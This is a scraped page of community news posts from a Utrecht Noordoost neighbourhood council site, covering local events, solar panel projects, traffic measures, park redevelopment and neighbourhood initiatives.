De dag start om 9.30 met een gratis symposium over Klimaatverandering in de Stad in het Castellum Hoge Woerd in Utrecht Leidsche Rijn. Deze dag wordt geopend door wethouder Openbare ruimte en Groen van Utrecht, Kees Geldof. In het symposium zullen Jeroen Kluck (TAUW), Erwin Rebergen (gemeente Utrecht) en Guus Beugelink (HDSR), u meer vertellen over de uitdagingen en oplossingen voor de stad Utrecht. Het symposium wordt afgesloten met de opening van de Waterweek van Utrecht Natuurlijk, door directeur Corrie Reijnhout. Opgeven voor deelname kan via het aanmeldformulier op www.gmjd.nl

Vanaf 13.00 uur laten 35 zelfbeheerlocaties en schoolpleinen zien hoe ze de verstening en wateroverlast tegengaan in het kader van de klimaatverandering. Op een aantal locaties worden workshops verzorgd. Alle informatie treft u aan op:

 

www.gmjd.nl                    info@gmjd.nl

@gmjd030           /gmjd030

 

Wilt u dit opnemen in de agenda, publiceren op de website of een reportage maken?

 

Namens Stg GroenmoetjeDoen!

Joyce Parlevliet

 

160508

Facebooktwittergoogle_pluspinterest

Energiebesparende Verenigingen van Eigenaars

In Utrecht zijn er vele Verenigingen van Eigenaars (VvE). De VvE zorgt voor het regelen van het onderhoud van het appartementsgebouw en alle andere gemeenschappelijke belangen van de eigenaren. VvE’s gaan zich ook steeds meer bezighouden met energiebesparende maatregelen.
IMG_1833
Twee enthousiaste Voordorpers, Sander Ekstijn en Christian Naethuys, zijn in 2012 met duurzame maatregelen voor hun VvE Artemis begonnen. Tussen 2013 en 2015 werden, na een Energieadvies op Maat, maatregelen als lift ‘slowstart’, bewegingssensoren en LED verlichting, doorgevoerd.
Sander: “Het is begonnen om met ‘relatief’ eenvoudige maatregelen bij onderhoud aan het gebouw dat toch al gepland stond geld te besparen. Met als bijkomend voordeel dat die ook goed zijn voor onze toekomst. Het accent verschoof steeds meer van besparen naar ‘onze toekomst’. Duurzaamheid moet de drijfveer worden om er aan te gaan beginnen.”

Zij hebben sinds november 2014 verschillende VvE’s uit Voordorp, de gemeente en andere organisaties, bij elkaar weten te krijgen. Samen hebben ze gekeken hoe ze, ondanks de complexe regels, energiebesparende en -opwekkende maatregelen kunnen nemen. De nadruk ligt momenteel bij de plaatsing van installaties voor zonnepanelen. Inmiddels zijn 7 VvE’s aangesloten bij het overleg “Groot dak zoekt zon!”. Bij beide bijeenkomsten was een vertegenwoordiger van energiepunt wonen aanwezig om ook het belang van de gemeente Utrecht te onderstrepen bij dergelijke stappen in het proces.

“Na ruim een jaar intensief onderzoeken met diverse experts zijn we nu klaar om de volgende stap te zetten.”, aldus Sander. “Bij mijn eigen VvE, met een geweldig mooi groot dak geschikt voor wel 600 panelen. Op de Algemene Ledenvergadering van 23 maart gaven de aanwezigen aan, vrijwel unaniem, dat ze het gemeenschappelijk dak beschikbaar willen stellen voor het plaatsen van zonnepanelen en hebben ze mandaat gegeven aan de werkgroep om de voorwaarden waaronder verder uit te zoeken. Deze besluiten zijn nog eens officieel bekrachtigd op een druk bezochte volledige tweede ALV op 19 april.”

Sander denkt dat zonne-energie goed toe te passen is voor VVE’s. “Veel daken bij VvE’s zijn uitermate geschikt. Ga die uitdaging aan! Met een paar enthousiaste leden in je VvE kan het lukken.” Christian benadrukt dat dit de eerste stap is om alle VvE’s in Voordorp over te kunnen laten stappen naar duurzame Energie (we gaan namelijk door).

BRON Gemeente Utrecht (Energiepunt Wonen)
FOTO BOVEN Op de voorgrond de sporthal van USV Hercules (waar nu 500 zonnepanelen op liggen) en op de achtergrond een aantal van de potentiele VvE’s waar op het platte dak voldoende ruimte is voor zonnepanelen (in het midden VvE Artemis).
FOTO’s ONDER VvE Artemis (met plek voor bijna 600 zonnepanelen)

IMG_1969 IMG_1968

Facebooktwittergoogle_pluspinterest

Kracht van Utrecht organiseert InitiatievenCafé op 22 april

Duurzamer ruimtegebruik en verkeer – kansrijk?
We organiseren het InitiatievenCafé in samenwerking met de gemeente, voor bewoners, ondernemers en organisaties. Wees welkom!

Lokatie: Rotslab, Rotsoord 9 in Utrecht
Datum/tijd: vrijdag 22 april van 15.00 tot 18.00 uur (zaal open om 14.30 uur)
Facultatief: rondleiding over en rond Rotsoord, van 13.00 tot 14.45 uur

kvu_cafe
Ga in gesprek met acht initiatieven
De Kracht van Utrecht is een stadsbrede groep van bewoners en experts. We zien tal van initiatieven opbloeien. Utrecht is broedplaats. Daarom geven we acht initiatieven in buurten en wijken van de stad een podium: Stichting Oosterspoorbaan, Mobiel Veemarkt & Tuindorp, Daalsepark, BuurtMobiel uit Overvecht, Abstederdijk, leefbare straat. Eric van Boven van Bar-Beton zal als ondernemer in de binnenstad aangeven hoe ondernemers kijken naar duurzame stadsontwikkeling en samenwerking met de gemeente.

Anna Vlaming (Amsterdamsestraatweg) zal zich vanuit twee rollen presenteren: als verkeersouder op een basisschool en als bewoner/animator van een groeiend bewonerscollectief. Bewoners van de Kersentuin uit Leidscherijn (“100% bewonersinitiatief”) lichten toe hoe zij in 2002 de bouw van hun wooninitiatief hebben aangepakt en hoe zij leren grip te houden op hun eigen leefomgeving.

Na de acht pitches krijgt elk initiatief een sta-tafel, waar deelnemers aan het café in een informele setting vragen aan initiatiefnemers stellen, tips geven en doorpraten over het initiatief. Doel van het cafe is om elkaar te inspireren om de omslag in denken over duurzamer ruimtegebruik en verkeer te maken.

BRON KRACHT VAN UTRECHT
Link naar volledige bericht
Link om je aan te melden

Facebooktwittergoogle_pluspinterest

Appartementen en groen op plek zorgcentrum Winklerlaan Utrecht

In de Kop op Tuindorp Oost komen vier appartementenblokken op de locatie van het huidige zorgcentrum aan de Winklerlaan. Het gebouw van het huidige zorgcentrum voldoet niet meer en wordt in 2018 gesloopt. De omgeving moet groen worden.

Vastgoedeigenaar Careyn wil met de herontwikkeling inspelen op veranderde wetgeving en trends in de ouderenzorg. Een deel van de 207 geplande appartementen is daarom bestemd voor zorgwoningen, maar er komen ook koopappartementen.

Samen met ontwikkelaar Zenzo, de gemeente, omwonenden, de wijkraad, volkstuinvereniging De Driehoek, het Gerrit Rietveld College en de eigenaren van stadsboerderij ‘het Lachende Paard’ is een plan voor de omgeving gemaakt. Zo is afgesproken dat parkeren uit het zicht gebeurt en er een verbinding tussen woningen en een nieuw park komt.

De gemeenteraad moet het plan nog goedkeuren en daarna start de bestemmingsplanprocedure. De bouw van de eerste appartementenblokken start naar verwachting in 2017. In 2020 moeten het park en de gebouwen klaar zijn.

BRON RTV UTRECHT
Bericht op website RTV Utrecht
Plannen op website Gemeente Utrecht
Bericht op website DUIC

Facebooktwittergoogle_pluspinterest

Effecten van de Knijp bij de Monicabrug

Op 23 maart was er een bijeenkomst inzake de knijp bij de Monicabrug. In de bijlage het artikel in AD over deze bijeenkomst.
Verder zijn de resultaten van de enquête gepresenteerd. Hier hebben rond de 650 mensen aan mee meegewerkt (de enquête was erg uitgebreid) en 480 hebben de enquête volledig hebben ingevuld. Men is over het algemeen niet te tevreden over de effecten van de knijp! Bij een aantal straten is een aanzienlijke verkeerstoename te zien (zie de kaart van de 2-meting). De zorgen, files, rondom Oudenoord / Kaatstraat/ Adelaarstraat en de Acaciastraat zijn enorm. De gemeente heeft geen oplossing voor de ontstane verkeerstoename op diverse locaties.

Veel irritatie bij de aanwezigen omdat de gemeente trots is dat bij de Weerdsingel het resultaat inzake milieu & afname verkeer nu ok lijkt. De ellende is echter verplaatst. Peter Koolhaas (de projectleider van de gemeente) wist op bijna geen enkele vraag antwoord te geven. Veel vragen werden geparkeerd. De zorgen nemen toe omdat de parkeergarage in de binnenstad met 6500 plaatsen nog meer verkeer aantrekt. Zorgen zijn er ook in Wijk Noordoost bij de nieuwbouwwijk Zijdebalen, want dan komt er nog meer verkeer bij.

Grote vraag is en blijft: wat is de visie van de gemeente? SRSR (de vervoersvisie van de gemeente Slimme Routes, Slim Regelen & Slim Bestemmen) is op detail niveau niet of slecht uitgewerkt. Iedere ingreep heeft consequenties en met cijfers wordt gegoocheld. Ook op het kaartje bij de Weerdsingel kloppen de cijfers niet. Peter Koolhaas heeft daarop geen antwoord op.

De gemeente moet met spoed iets doen aan Oudenoord / Kaatstraat files!

Facebooktwittergoogle_pluspinterest

Informatieavond Knijp Monicabrug op woensdag 23 maart

Op woensdag 23 maart 2016 organiseert de gemeente een informatieavond voor bewoners van Pijlsweerd, Ondiep en Noordoost. Op deze avond krijgt u uitleg over de resultaten van de 2-meting van de verkeersmaatregelen bij de Monicabrug.

Datum: woensdag 23 maart
Tijd: van 20.00 tot 22.00 uur, inloop vanaf 19.30 uur.
Locatie: Het Huis Utrecht, Boorstraat 107

Bekijk de resultaten van de 2-meting in de samenvatting en het rapport op de pagina Evaluatie en monitoring:

Of bekijk het wijkbericht:
Wijkbericht 2-meting Knijp Monicabrug

Facebooktwittergoogle_pluspinterest

Peuterspektakel op Griftsteede op 20 maart

Op 20 maart tussen 10.00 en 13.00 vindt er een peuteractiviteitenochtend plaats op Griftsteede georganiseerd door (kind)vrijwilligers en bewoners uit de buurt Noordoost.
Er zijn verschillende activiteiten op deze ochtend. Iedereen die samen met zijn of haar peuter plezier wil komen maken is welkom!

10.00 – 13.00 Springkussen, knutselen, speurtocht
10.30 – 13.00 Schminken
10.15 – 10.30 / 11.15 – 11.30 / 12.15 – 12.30 Voorlezen
10.00 – 12.30 Verkleedspeelhoek
10.30 – 11.00 / 11.30 – 12.00 Zingen en muziek maken

Vanaf 13.00 – 15.30 vinden er ook activiteiten plaats rondom het thema ‘Gezond Utrecht’.

Deze activiteitenochtend is mogelijk gemaakt door Wijk&co en Utrecht Natuurlijk. Wil je ook iets organiseren of heb je de wens om iets op Giftsteede te doen?  Kom dan naar ons toe op Griftsteede of neem contact op met: annamaria.schotborgh@wijkenco.nl

Adres: Griftsteede
Van Swindenstraat 129, Utrecht.

Facebook: Griftsteede Speelhonk

Filmpje over het Peuterspektakel

Facebooktwittergoogle_pluspinterest

USV Hercules wekt 100.000 kWh per jaar op met 500 zonnepanelen

Vandaag heeft USV Hercules een contract ondertekend voor het plaatsen van 500 zonnepanelen op het dak van de sporthal. De ondertekening vond zondagmiddag voorafgaand aan de wedstrijd tegen FC Lienden plaats in het Herculespaviljoen in Voordorp, in het bijzijn van de Utrechtse wethouder voor Duurzaamheid, Lot van Hooijdonk.

Bij de ondertekening van het contract waren ook vertegenwoordigers aanwezig van de Vereniging Sportbelangen Utrecht (VSU), Wijkraad Noordoost, Energiefonds Utrecht, EnergieU en EnergieCollectief Utrecht NO.

Hercules start vandaag ook officieel met de uitgifte van groencertificaten. Leden van Hercules kunnen deze speciale certificaten aanschaffen en daarmee de plannen financieel ondersteunen. Hercules-penningmeester Leo Zwinkels verklapte tijdens de ondertekening dat al voor ruim een kwart van de certificaten reserveringen geplaatst zijn.

Projectleider Jan van Beukering memoreerde voorafgaand aan de ondertekening hoe in anderhalf jaar tijd de samenwerking, financiering, techniek en het commitment van alle betrokkenen tot stand kwam. Daarmee is de Utrechtse sportvereniging koploper in de stad en de unanieme steun voor deze verduurzaming, smaakt volgens ingewijden naar meer.

Wethouder Lot van Hooijdonk was dan ook zeer in haar nopjes met het initiatief. ‘Hoe bij Hercules alle puzzelstukjes in elkaar vallen is prachtig om te zien. Niet alleen techniek en samenwerking zijn geregeld, ook de financiering is op orde. Mooi ook dat de leden dit beleid unaniem steunen. Een initiatief dat hopelijk veel navolging in de stad krijgt.’

De vijfhonderd zonnepanelen leveren een opbrengst van 100.000 kWh per jaar op en voorzien daarmee in een derde van de totale energiebehoefte van USV Hercules. Over twee weken start de aanleg.
3R3A1009

Facebooktwittergoogle_pluspinterest

In Between Café – 25 februari

Op 25 februari is er weer een maandelijkse bijeenkomst van het ‘In Between Café’.
Dit is van 9.15 – 12.00 uur in Buurtcentrum De Leeuw.

Tijdens deze maandelijkse bijeenkomsten worden inspirerende workshops gegeven.
Zowel werkzoekenden (op zoek naar werk) als zelfstandigen (op zoek naar opdrachten) zijn welkom om deze workshops te volgen.

Meer informatie vindt u op de site van het In Between Café of lees de uitnodiging.

Facebooktwittergoogle_pluspinterest

Samenredzaam met de deeleconomie

INSPIRERENDE BEWONERSAVOND: ‘SAMENREDZAAM MET DE DEELECONOMIE’.

Stichting BuurtWelzijn, De Deelkelder en Wijk&co hebben de handen ineen geslagen om bewoners in de wijk Utrecht Noordoost te laten profiteren van de voordelen van delen en wederkerigheid. De partijen organiseren samen een avond in Buurtcentrum De Leeuw om bewoners te informeren over de ontwikkeling van de deeleconomie in de wijk. Het evenement vindt plaats op 2 maart van 19.30 tot 22.00 uur in Buurtcentrum de Leeuw.

De deeleconomie is een economie waarbinnen mensen onderling producten en diensten uitwisselen, waardoor een duurzame vorm van consumptie ontstaat. Door deze vorm van delen wordt er niet alleen flink bespaard, maar worden ook nieuwe contacten gelegd waardoor de verbondenheid binnen de samenleving groeit.
De avond is een unieke kans om kennis te maken met de initiatieven die binnen deze deeleconomie actief zijn in de buurt. Niet alleen stellen de initiatieven zichzelf voor, ook is er een kans om meteen mee te doen!

Sprekers zijn onder andere De Deelkelder, Stichting BuurtWelzijn, ThuisAfgehaald, Wijk&co en MyWheels. De toegang is voor iedereen geheel gratis en aan het eind van de avond is er voor iedere bezoeker een leuke goodiebag om mee naar huis te nemen.

Buurtcentrum de Leeuw
Tijd: 19.30 – 22.00
Adres: Samuel van Houtenstraat 1, 3515 EA Utrecht
Wanneer u meer informatie wilt over deze avond of een van de sprekers dan kunt u contact opnemen met Marit Oude Engberink, projectleider Stichting BuurtWelzijn, 06 15 19 17 40, m.engberink@mijnbuurtwelzijn.nl.

Facebooktwittergoogle_pluspinterest

Winterweek van start met echt winterweer

030NatuurlijkOp zondag 17 januari is de Winterweek van Utrecht Natuurlijk begonnen met tuinvogelactiviteiten op vier verschillende plekken in de stad. Het dunne laagje sneeuw leek speciaal voor deze start neergelegd. De hele week zijn er nog winterse activiteiten voor jong en oud te beleven op de steedes van Utrecht Natuurlijk.

Met winters weer trekken vogels naar de stad. Tijdens de vogelexcursies en het tuinvogels tellen van afgelopen zondag werden er dan ook bijzondere vogels gespot. Om vogels te lokken naar eigen tuin en balkon maakten bezoekers pindaslingers, vetbollen en pindakaasappels.

Bij stadstuin Klopvaart maakten zo’n vijftig bezoekers vogelvoer en timmerden vogelhuisjes.
Ruim driehonderd mensen bezochten Griftsteede en maar liefst 27 vogelsoorten werden DSC07328-winterweek2016geteld tijdens de excursie o.l.v. IVN. Waaronder de buitenlandse aanwinst: de halsbandparkiet. Zo’n zestig kinderen maakten vogelvoer voor hun eigen vogelrestaurant.
Ook bij Koppelsteede in Lunetten hebben mensen bijzondere vogels gespot en vogelvoer gemaakt.
Bezoekers van Steede Hoge Woerd kregen een warm welkom van de schapen van de Steede en gingen daarna op zoek naar de vogels.  Zij spotten dertien vogelsoorten waaronder de heggenmus. Een nieuwkomer in dit Vinexgebied.

Facebooktwittergoogle_pluspinterest

Boom verplaatst naar Park De Groene Kop

Een boom die al jaren naast de gymzalen van het (oude) Gerrit Rietveld College stond is verplaatst. Na een grondige voorbereiding die al tijden geleden is begonnen was het eindelijk zo ver. Van 7-12 duurde de mooie klus die zonder veel problemen verliep. Dat we er nog maar lang plezier van mogen hebben!
WRNO_IMG_1751

Facebooktwittergoogle_pluspinterest

Wervelende Winterweek van Utrecht Natuurlijk 17 – 24 januari 2016

Wervelende Winterweek van Utrecht Natuurlijk

Van zondag 17 t/m zondag 24 januari organiseert Utrecht Natuurlijk een wervelende Winterweek met hartverwarmende activiteiten voor jong en oud.

Hoe overleven mensen, dieren en planten de winter? En hoe houden wij huis en haard duurzaam warm? Antwoorden op deze vragen vind je tijdens de Winterweek. Doe mee met bijzondere activiteiten op zes locaties van Utrecht Natuurlijk.

Tel mee bij Utrecht Natuurlijk

De Winterweek start met vogelexcursies met ontbijt tijdens de Nationale Tuinvogeltelling op zondag 17 januari.  In de middag gevolgd door de activiteit “Maak een vogelrestaurant”. Geef Utrechtse vogels wat extra energie om de winter goed te overleven.

Haak aan

De hele week voeren wij een geiten brei-actie voor geit Betty. Zij heeft het koud deze winter en daarom haken wij op alle steedes een lange sjaal voor haar.

Overleef

Leerlingen van Utrechtse basisscholen volgen de hele week  lessen  “Overleven in de winter”. Ook is er een bijzondere voorleesbelevenis voor kinderen van voorscholen en kinderopvang.

Laat initiatieven bloeien

Op woensdagavond 20 januari delen wij tips om duurzame initiatieven te laten bloeien tijdens de workshop fondsenwerving en crowdfunding.

Geniet en ontdek

Wij sluiten af met een wintermarkt bij Griftsteede. Kom genieten en ontdek hoe je huis en haard isoleert en je jezelf duurzaam warm kan houden in de winter. Meer weten over de winterweek? Bekijk het programma op www.utrechtnatuurlijk.nl

Facebooktwittergoogle_pluspinterest

De Groene Kop in het AD

Voorzitter Ab Kools van de wijkraad Noordoost windt er geen doekjes om. Het laaggelegen gebiedje langs de Eykmanlaan in Utrecht had geen beste reputatie.
Lees meer in het artikel

Facebooktwittergoogle_pluspinterest

Herinrichting Kapteynlaan/Romerostraat 26 november

Bewoners vinden de Kapteynlaan verkeersonveilig. Daarom gaat de gemeente de Kapteynlaan opnieuw inrichten. Ook het eerste deel van de Aartsbisschop Romerostraat tot de Sartreweg wordt opnieuw ingericht. De herinrichting sluit aan op de (her)ontwikkelingen van het Veemarkt-terrein en van winkelcentrum De Gaard.

De huidige wegversmallingen op de Kapteynlaan nodigen weggebruikers uit om harder te gaan rijden om de tegenligger voor te zijn. Dat kan voor gevaarlijke situaties zorgen. Zeker in combinatie met de aanwezigheid van schoolgaande kinderen. Een herinrichting is daarom gewenst.

Op 26 november 2015 is vooralsnog de laatste bewonersbijeenkomst in de Jeruzalemkerk van 19.30 tot 21.00 uur. Dan kunt u vragen stellen over zaken die nog niet helemaal duidelijk mochten zijn bij het lezen van de nota en het bekijken van de tekening.

Laatste reactienota (26-10-2015)
Definitief ontwerp (26-10-2016)

Website gemeente (maatregel 34)

Facebooktwittergoogle_pluspinterest

Slim Wonen in Noordoost 25 november

“Uw woning, comfortabel, gezond, warm én energieneutraal: slim wonen!”

Inwoners van de wijk Utrecht Noordoost zijn uitgenodigd voor de inloopavond ‘Slim Wonen’ op woensdag 25 november in de Singelkerk. In een slimme woning is het volgens de organisatoren comfortabel, warm en gezond wonen, bovendien is de woning energieneutraal. Slim wonen kan bereikt worden door de woning in stappen, of in één keer, te upgraden naar een woning die slim is in energiegebruik en bovendien zelf energie kan opwekken. En dat wordt steeds makkelijker.
Iedereen kan deze avond terecht voor goed, gratis en persoonlijk advies over ‘slim wonen’. Ook voor huurders, en studenten die op kamers wonen, zijn er adviseurs aanwezig.

voorkant- inloopavondNoordoost achterkant-inloopavondNoordoost

Succesverhalen uit Noordoost
Matthijs Bierman , Directeur Triodos Bank Nederland én inwoner van Noordoost, vertelt over zijn ervaring met energieneutraal wonen in Utrecht Noordoost, er is tot 17:30 gelegenheid om met hem in gesprek te gaan.
Verder vertellen bewoners uit de wijk over hoe ze in korte tijd en met succes (gezamenlijk) huizen isoleerden en zonnepanelen plaatsten. Ook zijn er verschillende andere wijkinitiatieven aanwezig, onder andere op het gebied van energie, mobiliteit, bereikbaarheid en educatie, ook leuk voor kinderen!

Wijkweegschaal
Studenten van de Hogeschool Utrecht hebben een wijkweegschaal ontwikkeld. Hoe de weging qua energieverbruik uitpakt voor Noordoost wordt 25 november onthuld door kinderen uit de wijk met André van Schie, raadslid voor de VVD.

Duurzaamheid en geluk
Er is een doorlopend programma maar er zijn ook workshops waaronder die over ‘Duurzaamheid en geluk’, door Michiel Hobbelt, ‘Nul-op-de-meter: comfortabel en energieneutraal wonen’, door Theo Land, ‘Je CV kan stukken beter, stop met teveel betalen’, door Frans van de Berg en ‘Alles over zonnepanelen’. Kijk voor het programma op www.utrecht.nl/energiepuntwonen

De organisatie van de avond is in handen van een samenwerkingsverband van energieambassadeurs, de wijkraad, inwoners van de wijk Noordoost, de gemeente Utrecht, EnergieU, en de Stichting [H]eerlijk Wonen.

De inloopavond ‘Slim wonen in Utrecht Noordoost’ is op woensdag 25 november van
17.00 – 21.00 uur in de Singelkerk in Utrecht (Wittevrouwensingel 28, 3581 GC).
Aanmelden voor de avond kan via energie.wonen@utrecht.nl, met als onderwerp ‘Slim wonen Noordoost’. Maar ook mensen die op het laatste moment besluiten om te komen zijn van harte welkom. Broodjes en warme chocomelk staan klaar!

Facebooktwittergoogle_plus<img alt="pinterest" title="Pin it with Pinterest" class="synved-share-image synved-social-image synved-social-image-share" width="16" height="16" style="display: inline; width:16px;height:16px; margin: 0; padding: 0; border: none; box-shadow: none;" src="http://www.wijkraadnoordoost.nl/wp-content/plugins/social-media-feather/synved-social/image/social/regular/32×32/pinterest helpful hints.png” />

Facebooktwittergoogle_pluspinterest

Workshop Bijenhotels bouwen 24 oktober

Heb je zin in een middag buiten zijn en genieten van de herfst? Kom zaterdag 24 oktober van 14:00 tot 16:00 naar de workshop bijenhotels bouwen.
We gaan in de tuin van imker Sonja Copijn in Groenekan kleine bijenhotels maken om mee te nemen naar huis. Leuk voor je buurttuin, moestuin of balkon. En goed toeven voor de wilde bijen.
Bloemen en bijen zijn onlosmakelijk met elkaar verbonden. Ondanks de vele bloemenpracht in Nederland, zijn veel soorten wilde bijen met uitsterven bedreigd. Hoe komt dit? En hoe kunnen wij de wilde bijen – gemakkelijk – een handje helpen? Daar kom je tijdens deze workshop bijenhotels achter! We maken kleine bijenhotels om zelf mee te nemen en op te hangen in je eigen tuin. Wil je je bijenhotel personaliseren? Neem dan mee: stronkjes hout (zonder scheuren), bamboe, riet, stengels, dennenappels of ander organisch (afval)materiaal.
Na afloop verwelkomen we de herfst met koffie en taart.

Deze workshop wordt verzorgd door Marianne Noordijk en Ursula Engel en komt voort uit de initiatieven Places to Bee (www.facebook.com/placestobee) en De Groene Stadsmaker (www.degroenestadsmaker.nl).
Meer informatie? Mail: placestobeeworkbijenhotel24102015shops@gmail.com
U.Engel@degroenestadsmaker.nl

Locatie: Groenekanseweg 90A, achterin de tuin! (25 minuten fietsen vanaf Utrecht Centraal)

Bijdrage: 5.- euro
Aanmelding: via Facebook, graag alleen inschrijven als je echt van plan bent te komen.

Zowel volwassenen als kinderen zijn welkom (kinderen vanaf 12 jaar ook zonder ouder welkom).

Facebooktwittergoogle_pluspinterest

Van Boer tot Buur – Afhaalpunt Rechtstreex op Griftsteede

Photoshoot Beev-09034Van Boer tot Buur – Afhaalpunt Rechtstreex: Sinds 7 oktober jl. is er een afhaalpunt van Rechtstreex  op Griftsteede in het Griftpark onder de naam Van Boer tot Buur. Rechtstreex (www.rechtstreex.nl) verzamelt streekproducten van lokale boeren (max 50 km rond de dom) met een bijzonder verhaal (biologisch, biodynamisch of puur&eerlijk). 4 Kenmerken zijn daarbij van belang: stimuleren locale economie, duurzaamheid (verkorten transportweg), sociaal karakter (buurtgenoten samenbrengen en boeren in contact brengen met stedelingen) en transparantie over het productieproces.

Buurtgenoten van het Griftpark kunnen via een nieuwsbriefinschrijving bestellen en op woensdagmiddag hun bestelling afhalen op Griftsteede.
Mariëlle Brussaard Wijkchef Van Boer tot Buur – Afhaalpunt Rechtstreex @ Griftpark

https://www.rechtstreex.nl/producten/cc41d53cd395cbfb9689bab6b73a8ce5

 

Facebooktwittergoogle_pluspinterest

Update: Stadspark De Groene Kop

Door de nieuwe stedenbouwkundige invulling van Careyn van de Lichtkring en Tuindorp Oost is nu duidelijk hoe het park De Groene Kop en de openbare ruimte rondom Careyn op elkaar gaan aansluiten. Dit is besproken op de 3e participatieavond met deelnemende burgers in april 2015. Met dit laatste ontwerp sluiten we nu zo goed mogelijk aan op de wensen van de initiatiefnemers voor de herinrichting van het park.

De heraanleg van het park wordt gefinancierd uit het Meerjaren Groenprogramma van de Gemeente en voor een deel uit het programma Stedelijk Water.

Fase 1 en 2
Het park wordt in twee fasen aangelegd.
In fase 1 (2015-2016) doen we alle werkzaamheden voor de aanleg van het park die op korte termijn mogelijk zijn.

In fase 2 (2018-2020) als de nieuwbouw van Careyn gereed is, kan het park worden afgerond. Dit betreft vooral het doortrekken van twee wandelpaden vanuit de wijk het park in.

Werkzaamheden
Dit najaar starten de werkzaamheden voor de bodemsanering en het graven van de delen die voor waterberging geschikt gemaakt worden (noordhoek).

Volgend voorjaar hopen we het grondwerk af te ronden en paden in aanleg te hebben. Daarna kunnen we verder met de aanleg van de Jongeren Ontmoetingsplek (JOP).

Het park krijgt een prominente entree aan de westzijde, die aansluit op de nieuwbouw rondom het Rietveldcollege. Hiervoor is al een oversteek gemaakt op de Eykmanlaan.

Na de herontwikkeling van Careyn worden het park en de openbare ruimte rondom de nieuwbouw van Careyn op elkaar aangesloten.

 

Facebooktwittergoogle_pluspinterest

Wees welkom bij buurtcentrum de Leeuw 29 september

Wees welkom!

Kom op dinsdag 29 september voor een kopje koffie bij Buurtcentrum De Leeuw, Samuel van Houtenstraat 1.

Meer contacten?

Meer gezelligheid?

Meer activiteiten?

Wilt u antwoord op deze vragen?

U bent van harte welkom op een van de volgende tijdstippen:

9.00- 11.00 uur

13.00 – 15.00 uur

19.00 – 21.00 uur

Wij zijn Vera, Ireen, Juul en Desiree en wij zijn vrijwilligers bij De Leeuw. Met dit initiatief willen we ervoor zorgen dat buurtbewoners elkaar gemakkelijker kunnen ontmoeten.
Tot dinsdag de 29ste!

Voor meer informatie kunt u bellen met het algemene nummer van buurtteam Noordoost, 030 – 740 05 08.
Ons initiatief is in samenwerking met het buurtteam en wordt ondersteund door de sociaal makelaars van Wijk & Co.

Facebooktwittergoogle_pluspinterest

Initiatievencafe Zorg & Welzijn 17 september

Initiatievencafé Zorg- & Buurtinitiatieven

Op donderdagavond 17 september a.s. organiseren de Sociaal Makelaars en de Zorgverslimming  in samenwerking met deGemeente Utrecht een initiatievencafé voor kleine en grote zorginitiatieven en sociale buurtinitiatieven. Het café staat voor laagdrempelige ontmoetingen tussen initiatiefnemers met vragen (b.v. hoe start u een zorginitiatief, waar moet u allemaal aan denken, wat kunt u doen als u vastloopt) en deskundigen die met al hun ervaring en expertise met u meedenken, zodat u weer een stap verder komt met (de uitvoering van) uw plannen en ideeën.

Het doel van het initiatievencafé Zorg & Welzijn is ‘’Samen verder komen, kennis delen, elkaar inspireren, dromen waarmaken en problemen oplossen’’.

Tijdens het initiatievencafé zullen verschillende werktafels aanwezig zijn:
1. aansprakelijkheid / regels en de rek
2. financiering en indicaties
3. vrijwillige inzet bij initiatieven
4. zichtbaarheid en vindbaarheid van initiatieven

Plenair delen we de uitkomsten. Er is ook voldoende gelegenheid om te netwerken en je te laten inspireren.

Locatie: CultuurCampus Vleuterweide, Burchtpoort 16 in Vleuten.
Tijd: we starten om 19 uur tot en met 22 uur.

Aanmelden via dit formulier. In het aanmeldformulier geeft u aan of u initiatiefnemer bent (de vraag die u hebt, voor welke werktafel) of dat u graag wilt adviseren (geef de werktafel aan). Natuurlijk kunt u ook zowel initiatiefnemer als adviseur zijn. U kunt zich opgeven voor één werktafel. Voor meer informatie kunt u contact op met Jolanda van den Berg: jolandavandenberg@welzaamutrecht.nl.

Welkom bij Welzaam

 

Facebooktwittergoogle_pluspinterest